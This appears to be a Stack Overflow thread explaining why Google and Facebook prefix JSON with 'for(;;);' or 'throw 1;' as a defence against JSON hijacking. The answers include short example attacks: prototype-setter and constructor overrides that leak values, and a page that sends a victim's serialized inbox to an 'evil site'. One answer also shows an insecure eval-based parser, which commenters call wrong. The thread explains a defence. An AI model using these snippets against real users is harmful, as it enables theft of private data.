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Possible Duplicate:
Why does Google prepend while(1); to their JSON responses?

Google returns json like this:

throw 1; <dont be evil> { foo: bar}

and Facebooks ajax has json like this:

for(;;); {"error":0,"errorSummary": ""}
  • Why do they put code that would stop execution and makes invalid json?
  • How do they parse it if it's invalid and would crash if you tried to eval it?
  • Do they just remove it from the string (seems expensive)?
  • Are there any security advantages to this?

In response to it being for security purposes:

If the scraper is on another domain they would have to use a script tag to get the data because XHR won't work cross-domain. Even without the for(;;); how would the attacker get the data? It's not assigned to a variable so wouldn't it just be garbage collected because there's no references to it?

Basically to get the data cross domain they would have to do

<script src="http://target.com/json.js"></script>

But even without the crash script prepended the attacker can't use any of the Json data without it being assigned to a variable that you can access globally (it isn't in these cases). The crash code effectivly does nothing because even without it they have to use server sided scripting to use the data on their site.

5

4 Answers 4

198

Even without the for(;;); how would the attacker get the data?

Attacks are based on altering the behaviour of the built-in types, in particular Object and Array, by altering their constructor function or its prototype. Then when the targeted JSON uses a {...} or [...] construct, they'll be the attacker's own versions of those objects, with potentially-unexpected behaviour.

For example, you can hack a setter-property into Object, that would betray the values written in object literals:

Object.prototype.__defineSetter__('x', function(x) {
    alert('Ha! I steal '+x);
});

Then when a <script> was pointed at some JSON that used that property name:

{"x": "hello"}

the value "hello" would be leaked.

The way that array and object literals cause setters to be called is controversial. Firefox removed the behaviour in version 3.5, in response to publicised attacks on high-profile web sites. However at the time of writing Safari (4) and Chrome (5) are still vulnerable to this.

Another attack that all browsers now disallow was to redefine constructor functions:

Array= function() {
    alert('I steal '+this);
};

[1, 2, 3]

And for now, IE8's implementation of properties (based on the ECMAScript Fifth Edition standard and Object.defineProperty) currently does not work on Object.prototype or Array.prototype.

But as well as protecting past browsers, it may be that extensions to JavaScript cause more potential leaks of a similar kind in future, and in that case chaff should protect against those too.

7
  • 1
    Very interesting I never thought of using setters. +1 Jun 30, 2010 at 9:06
  • How does the attacker influence the constructor? How is this tainted data executed by the client?
    – rook
    Jul 17, 2010 at 2:22
  • Read about CSRF attacks. Jul 17, 2010 at 2:35
  • +1 Yes, bobice is correct. I wanted to see a real world attack like this one against gmail: jeremiahgrossman.blogspot.com/2006/01/…
    – rook
    Jul 17, 2010 at 6:35
  • 17
    It took me quite some thinking to understand the attack mechanism here. For anyone who doesn't get it: the attacker lures the user to a page under the attacker's control which has two script tags on it. The first script makes the needed modifications to the prototypes of Array and Object. The second script tag's src attribute points to the JSON-returning URL on the target site, causing the user to fetch the JSON (sending cookies with the request; there's no way to avoid that in a script request) and execute it as JavaScript.
    – Mark Amery
    Jan 17, 2014 at 9:28
61

Consider that, after checking your GMail account, that you go visit my evil page:

<script type="text/javascript">
Object = function() {
  ajaxRequestToMyEvilSite(JSON.serialize(this));
}
</script>
<script type="text/javascript" src="http://gmail.com/inbox/listMessage"></script>

What will happen now is that the Javascript code that comes from Google -- which the asker thought would be benign and immediately fall out of scope -- will actually be posted to my evil site. Suppose that the URL requested in the script tag sends (because your browser will present the proper cookie, Google will correctly think that you are logged in to your inbox):

({
  messages: [
    {
      id: 1,
      subject: 'Super confidential information',
      message: 'Please keep this to yourself: the password is 42'
    },{
      id: 2,
      subject: 'Who stole your password?',
      message: 'Someone knows your password! I told you to keep this information to yourself! And by this information I mean: the password is 42'
    }
  ]
})

Now, I will be posting a serialized version of this object to my evil server. Thank you!

The way to prevent this from happening is to cruft up your JSON responses, and decruft them when you, from the same domain, can manipulate that data. If you like this answer, please look at the one posted by bobince.

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  • 1
    I´m pretty sure Gmail´s auth is not only based on cookies, as that would be very, very weak as you describe here. I think they also incorperate session keys in the URL, which you page can´t just intercept.
    – Dykam
    Jul 17, 2010 at 8:23
  • 39
    The problem with a site whose target audience is programmers, is that every once in a while you will encounter people who are {hope,point,use}lessly pedantic. Try this: a) It's an example of how such an attack could work, not the complete hacker's reference for carrying out attacks against Gmail, and b) as has been pointed out another answer to this question, a similar attack was demonstrated against Gmail, allowing an attacker to access a user's contact list. Jul 17, 2010 at 10:11
26

EDIT

These strings are commonly referred to as an "unparseable cruft" and they are used to patch an information leakage vulnerability that affects the JSON specification. This attack is real world and a vulnerability in gmail was discovered by Jeremiah Grossman. Mozilla also believes this to be a vulnerability in the JSON specification and it has been patched in Firefox 3. However because this issue still affects other browsers this "unparseable cruft" is required because it is a compatible patch.

Bobice's answer has a technical explanation of this attack and it is correct.

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  • Now that makes a lot more sense usage wise and it explains why sites like google and facebook use it (allowing cross domain requests for gadgets, widgets and what-have-you) Jun 30, 2010 at 8:19
  • 1
    This is not the right answer, no matter who gave you the answer. The right answer, in terms comprehensiveness and correctness, is the one given by user bobince at the bottom. Preventing JSON output from a script from being viewed in a browser doesn't even make sense, if it has Content-Type text/json it would not even be opened and if it were text/[x]html it would be bad HTML. In no case would the browser execute it if fed as the input document. Crufting is to prevent CSRF attacks and JSON evaluation, because on an attacker's site the Object prototype could be overridden to steal data. Jul 17, 2010 at 2:11
  • 1
    @Jesse Dhillon bobince maybe correct but his post is missing something, its not clear how the attacker is able to influence the constructor. I still think this is to protect a Cross-Domain Proxy. For now i'm siding with google.
    – rook
    Jul 17, 2010 at 2:24
  • Read en.wikipedia.org/wiki/CSRF. I have a site; you come to my site after logging into your JSON-heavy bank website. On my site I have defined the constructor, because it's my site. I embed a cross-domain script tag which OP thought would result in benign objects being immediately discarded, except they aren't. They're captured by my malicious constructor. Jul 17, 2010 at 2:34
  • 2
    @Jesse Dhillon Look at this exploit that I have written (exploit-db.com/exploits/7922). If you can tell me how this XHR attack is related to an unparseable curft, I'll accept that its CSRF related. Because the security mechanism is written in JS, I'm pretty sure is xss related.
    – rook
    Jul 17, 2010 at 5:59
5

How do they parse it if it's invalid and would crash if you tried to eval it?

It's a feature that it would crash if you tried to eval it. eval allows arbitary JavaScript code, which could be used for a cross-site scripting attack.

Do they just remove it from the string (seems expensive)?

I imagine so. Probably something like:

function parseJson(json) {
   json = json.replace("throw 1; <dont be evil>", "");
   if (/* regex to validate the JSON */) {
       return eval(json);
   } else {
       throw "XSS";
   }
}

The "don't be evil" cruft prevents developers from using eval directly instead of a more secure alternative.

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  • 7
    It's there to prevent using eval. Don't try to sidestep it, use a dedicated JSON parser instead!
    – kibibu
    Jun 30, 2010 at 6:23
  • This seems to be closer to the actual purpose than for preventing scraping (being that either way to scrap you need server sided scripting) +1 Jun 30, 2010 at 6:28
  • @kibubu A dedicated JSON parser should throw an error on that though. Jun 30, 2010 at 6:28
  • 7
    I'd like to see that regex, if you don't mind. Hint - don't waste time trying to write it :)
    – Kobi
    Jun 30, 2010 at 6:31
  • 1
    A bit late to the party, but this answer is completely irrelevant and wrong.
    – michael
    May 30, 2016 at 21:29

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